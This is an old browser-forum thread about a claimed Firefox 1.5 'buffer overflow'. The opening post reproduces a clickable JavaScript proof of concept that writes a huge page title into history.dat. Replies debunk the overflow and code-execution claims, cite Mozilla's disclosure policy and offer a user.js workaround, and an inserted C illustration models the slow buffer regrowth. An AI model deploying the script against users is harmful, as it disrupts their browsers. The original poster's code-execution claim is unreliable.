FireFox 1.5 Buffer overflow exploit

Discussion of bugs in Mozilla Firefox
markedmannerf
Guest

FireFox 1.5 Buffer overflow exploit

Post by markedmannerf »

This may have already been reported, but I'm going to post it here.

<!-- Firefox 1.5 buffer overflow

Basically firefox logs all kinds of URL data in its history.dat file,
this little script will set a really large topic and Firefox will then
save that topic into its history.dat.. The next time that firefox is
opened, it will instantly crash due to a buffer overflow -- this will
happen every time until you manually delete the history.dat file -- which
most users won't figure out.

this proof of concept will only prevent someone from reopening
their browser after being exploited. DoS if you will. however, code
execution is possible with some modifications.

Tested with Firefox 1.5 on Windows XP SP2.

ZIPLOCK <sickbeatz@gmail.com>

-->
<html><head><title>heh</title><script type="text/javascript">
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>
name already taken
Posts: 3124
Joined: February 27th, 2004, 9:54 am
Location: Utah

Post by name already taken »

You'll want to file a bug at https://bugzilla.mozilla.org/
"It burns like hygiene!"
hellene
Posts: 5130
Joined: March 20th, 2005, 5:29 pm
Location: Bradford W.Yorks
Contact:

Post by hellene »

I'll shift this over to Firefox Bugs for further discussion. Interesting discovery. markedmannerf you will have to register a username if you want to post in that forum.
I don't know how to do any of this stuff, I just hire the guys that do
Have you considered reading the HELP folder. Right there on your menu bar.
Image by Juniper http onic.net/~daylight/ - Xmas special by Ol Grumpy
scratch
Posts: 4942
Joined: November 6th, 2002, 1:27 am
Location: Massachusetts

Post by scratch »

This is NOT the proper way to report a security bug.

please see http://www.mozilla.org/projects/securit ... olicy.html
mesostinky
Posts: 215
Joined: November 4th, 2002, 10:44 pm
Location: NJ

Post by mesostinky »

Is this your source?

http://packetstormsecurity.org/0512-exp ... erflow.txt

Hopefully they at least notified the security crew before they published this. Seeing as no update has been pushed out I assume not. How kind of them.
Elfguy
Posts: 309
Joined: June 27th, 2005, 5:56 pm
Contact:

Post by Elfguy »

It's on digg now http://digg.com/security/Kill_Firefox_1 ... te_exploit which means everyone knows.
VIPerous
Posts: 120
Joined: September 20th, 2003, 5:15 am

Post by VIPerous »

Elfguy wrote:It's on digg now http://digg.com/security/Kill_Firefox_1 ... te_exploit which means everyone knows.

And here is one of the comments from Digg:

"And I can't believe you didn't see where the stack is involved. The size of whatever FF is reading is obviously BIGGER than whatever BUFFER is being used to store it, thus causing an OVERFLOW of that BUFFER."

How do YOU see where the stack is involved?

There is no buffer overflow and no threat of arbitrary code execution; Firefox does not crash when the script is executed, nor at startup when it reads history.dat.

The script causes a very large (~10MB) string to be written to history.dat (That's just a text file, you can open it in Notepad and take a look). The algorithm Firefox uses to parse this file was presumably not intended to handle such large strings and therefore takes a long time to load the file (1 to 2 mins).

It allocates a buffer on the heap of arbitrary size and begins reading the string. When it determines that the buffer is not big enough to hold the entire string it allocates a new, larger buffer, copies the old data to the new buffer, and continues reading. Repeat until you've allocated a buffer large enough to hold the entire 10MB string. Inefficient? Yes. Buffer overflow exploit? No.
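Added illustration of the reallocate-and-copy parse VIPerous describes (example code written here, not Firefox's history.dat reader): a reader that grows its buffer by a fixed step copies the field many times over, one that doubles its capacity copies far less, and a length cap bounds the work regardless of title size. The make_title helper, the step and doubling policies and the max_len cap are all assumptions for the demonstration, not Firefox's actual behaviour or fix.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* copied: bytes memcpy'd across regrowths; length: bytes of the field kept. */
typedef struct { size_t copied, length; } read_stats;
/* Constructed input: an n-byte title of 'A's, like the OP's script produces. */
static char *make_title(size_t n)
{
    char *t = malloc(n + 1);
    if (!t) abort();
    memset(t, 'A', n); t[n] = '\0';
    return t;
}

/* Model of the reader VIPerous describes (hypothetical, not Firefox code): read src
 * into a heap buffer of `initial` (>= 2) bytes; whenever it fills, allocate a bigger
 * one (by `step` bytes, or doubled when step is 0), copy the old data across, go on.
 * A nonzero max_len truncates the field: an assumed mitigation.  Caller frees *out. */
static read_stats read_field(const char *src, size_t initial, size_t step, size_t max_len, char **out)
{
    read_stats st = {0, 0}; size_t cap = initial;
    char *buf = malloc(cap);
    if (!buf) abort();
    for (const char *p = src; *p; p++) {
        if (max_len && st.length >= max_len) break;   /* bounded read */
        if (st.length + 1 >= cap) {                   /* no room for byte + NUL */
            size_t ncap = step ? cap + step : cap * 2;
            char *nbuf = malloc(ncap);
            if (!nbuf) abort();
            memcpy(nbuf, buf, st.length);             /* the cost being measured */
            st.copied += st.length;
            free(buf); buf = nbuf; cap = ncap;
        }
        buf[st.length++] = *p;
    }
    buf[st.length] = '\0';
    *out = buf;
    return st;
}

int main(void)
{
    char *title = make_title(200000), *out;
    read_stats lin = read_field(title, 4096, 4096, 0, &out); free(out);    /* linear growth */
    read_stats dbl = read_field(title, 4096, 0, 0, &out);    free(out);    /* doubling */
    read_stats cut = read_field(title, 4096, 0, 1024, &out); free(out);    /* capped at 1 KiB */
    printf("copied: linear %zu, doubling %zu, capped %zu\n", lin.copied, dbl.copied, cut.copied);
    free(title); return 0;
}
```

With a 200,000-byte title the fixed-step reader copies about 4.8 MB in total while the doubling reader copies about 258 KB; the capped reader never regrows at all.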
Elfguy
Posts: 309
Joined: June 27th, 2005, 5:56 pm
Contact:

Post by Elfguy »

It's not a "security issue" as there's no known way to exploit or run malicious code, all this does is cause Firefox to load much slower. Still I think this should be fixed fast and a 1.5.1 should be available within a week to reaffirm that open source releases fixes fast. It's a PR thing. Would be good to see if the update feature works fine too!
Unarmed
Posts: 4941
Joined: July 31st, 2003, 1:26 pm

Post by Unarmed »

One-line fix in user.js:


user_pref("capability.policy.default.HTMLDocument.title.set", "noAccess");


Probably a few edge cases of legitimate sites not being able to set your window title, but screw ’em.
Elfguy
Posts: 309
Joined: June 27th, 2005, 5:56 pm
Contact:

Post by Elfguy »

hellene
Posts: 5130
Joined: March 20th, 2005, 5:29 pm
Location: Bradford W.Yorks
Contact:

Post by hellene »

Thanks for picking up on this Elfguy and others. The OP started off in the user support forum - I figured the crew over here might have some more answers.
Spaceman-Spiff
Posts: 46
Joined: November 28th, 2002, 6:25 pm

Post by Spaceman-Spiff »

Is this fix for the same buffer overflow mentioned in this page? http://forums.mozillazine.org/viewtopic.php?t=346858
Peng
Posts: 778
Joined: November 9th, 2004, 2:31 pm
Location: Central Florida
Contact:

Post by Peng »

Spaceman-Spiff wrote:Is this fix for the same buffer overflow mentioned in this page? http://forums.mozillazine.org/viewtopic.php?t=346858


They're two different problems.
Hug Peng
(aka Matt Nordhoff)
Check out: Adblock Plus | FoxClocks | OpenBook
Vallejo
Posts: 104
Joined: November 12th, 2004, 6:16 am

Post by Vallejo »

Thanks, Unarmed, for the workaround -- that's a lot better than having to set my history to 0 days.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
diilbert
Posts: 13
Joined: May 15th, 2005, 1:20 pm

Post by diilbert »

Unarmed wrote:One-line fix in user.js:


user_pref("capability.policy.default.HTMLDocument.title.set", "noAccess");


Probably a few edge cases of legitimate sites not being able to set your window title, but screw ’em.


I am unable to find the user.js file.... I tried adding to the prefs.js w/o success... Any direction?

I am using XP SP2. Thanks.